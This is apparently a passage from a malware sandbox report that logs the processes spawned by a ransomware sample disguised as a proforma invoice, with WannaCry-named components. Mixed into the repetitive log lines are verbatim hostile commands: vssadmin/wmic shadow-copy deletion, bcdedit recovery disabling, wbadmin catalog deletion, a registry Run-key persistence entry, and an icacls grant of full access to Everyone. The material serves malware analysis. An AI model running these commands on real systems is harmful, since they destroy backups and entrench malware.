            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 118491705402797.batJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
